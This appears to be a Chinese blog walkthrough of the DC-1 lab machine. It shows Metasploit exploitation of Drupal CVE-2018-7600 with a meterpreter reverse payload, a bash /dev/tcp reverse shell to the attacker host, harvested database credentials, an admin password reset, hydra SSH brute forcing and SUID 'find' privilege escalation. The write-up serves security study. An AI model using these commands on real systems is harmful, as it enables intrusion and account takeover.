渗透测试实战-DC-1

Aimin20222025-01-06 20:06

firewall-cmd --reload

DC-1 靶机实战

打开测试靶机DC-1

查看网络配置,及网卡

靶机使用NAT 模式,得到其MAC地址

使用nmap 工具扫描内网网段

nmap -sP 192.168.1.144/24 -oN nmap.Sp

MAC 对照得到其IP地址

对其详细进行扫描

nmap -A 192.168.1.158 -p 1-65535 -oN nmap.A

可以看到其80 22 端口都是开放的

在80端口下,我们可以看到其网站的模板为:Drupal 7

22 爆破

80 drupal CMS

国外三大PHP CMS 之一

drupal

wordpress

joomla

其80端口开放,我们可以使用浏览器直接访问IP地址

MSF

通过使用MSF 直接搜索该网站模板存在的漏洞

启动

msfconsole

search drupal

使用该攻击模块

通过查看References来查看该漏洞的详细信息;

References:

https://cvedetails.com/cve/CVE-2018-7600/

https://www.drupal.org/sa-core-2018-002

https://greysec.net/showthread.php?tid=2912

https://research.checkpoint.com/uncovering-drupalgeddon-2/

https://github.com/a2u/CVE-2018-7600

https://github.com/nixawk/labs/issues/19

https://github.com/FireFart/CVE-2018-7600

选择攻击载荷

set payload php/meterpreter/reverse_tcp

缺少目标地址,源地址

添加

set RHOSTS 192.168.1.158

set LHOST 192.168.1.150

攻击

拿到shell

flag1

Every good CMS needs a config file - and so do you.

这句话 指引我们,应该去找的该网站的配置文件

所在目录:

sites/default/

flag2

cat sites/default/settings.php

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

'host' => 'localhost',

shell

进入交互式界面

尝试进行数据库连接

mysql -udbuser -pR0ck3t

连接失败

考虑反弹shell

反弹shell

本地监听2333端口

nc -lvvp 2333

bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

直接反弹失败

借助python 反弹

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@DC-1:/var/www/sites/default$ bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

反弹成功

登录数据库

尝试在反弹shell 下执行连接数据库

还是失败了

但是我们发现有意思的事情,我们在kali 本机的python 交互式环境下可以成功连接到数据库

www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t

登入成功

进入数据库drupladb

查询users数据表

select * from users\G

重置后台管理员密码

重置admin 用户密码

这里我们破解admin 用户密码要耗费时间,我们可以考虑重置admin 用户密码,使用drupal 自带脚本重新生成密码。

php scripts/password-hash.sh admin

password: admin hash: SD9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt

更新users 表

update users set pass="SD9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

更新成功

flag3

提示我们 etc/passwd

flag4

可以看到我们的flag4 用户是可以登录的

接下来我们使用hydra 爆破,该用户密码

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.158 ssh -vV -f -o hydra.ssh

我们进入/root 家目录,发现没有权限

是否有一些命令具有SUID 标志

find / -perm -4000 2>/dev/null

利用操作系统内核提权

mkdir

find GGG -exec "whoami" \;

find GGG -exec "/bin/sh" \;

测试完成

相关推荐
电商API&Tina16 分钟前
1688 拍立淘接口(item_search_img)测试与接入实战心得
java·大数据·前端·物联网·oracle·json
行走的搬运工22 分钟前
Spring Security_05
java·spring·mybatis
我登哥MVP25 分钟前
【Spring6笔记】 - 11 - JDBCTemplate
java·数据库·spring boot·mysql·spring
也许明天y35 分钟前
Spring AI 核心原理解析:基于 1.1.4 版本拆解底层架构
java·后端·spring
默|笙41 分钟前
【Linux】线程互斥与同步_同步(2)_环形队列
linux·运维·服务器
小红的布丁1 小时前
BIO、NIO、AIO 与 IO 多路复用:select、poll、epoll 详解
java·数据库·nio
lifallen1 小时前
Flink Checkpoint 流程、Barrier 流动与 RocksDB 排障
java·大数据·flink
cui_ruicheng1 小时前
Linux IO入门(一):从C语言IO到文件描述符
linux·运维·c语言
丸子家的银河龙1 小时前
yocto使用实例[1]-自定义内核配方
linux
疯狂打码的少年1 小时前
【Day12 Java转Python】Python工程的“骨架”——模块、包与__name__
java·开发语言·python
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04GPT-6核心能力解析及与现有主流大模型对比05基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09从限购到畅通:GLM-5.1 Coding Plan接入攻略10Oh My Codex 快速使用指南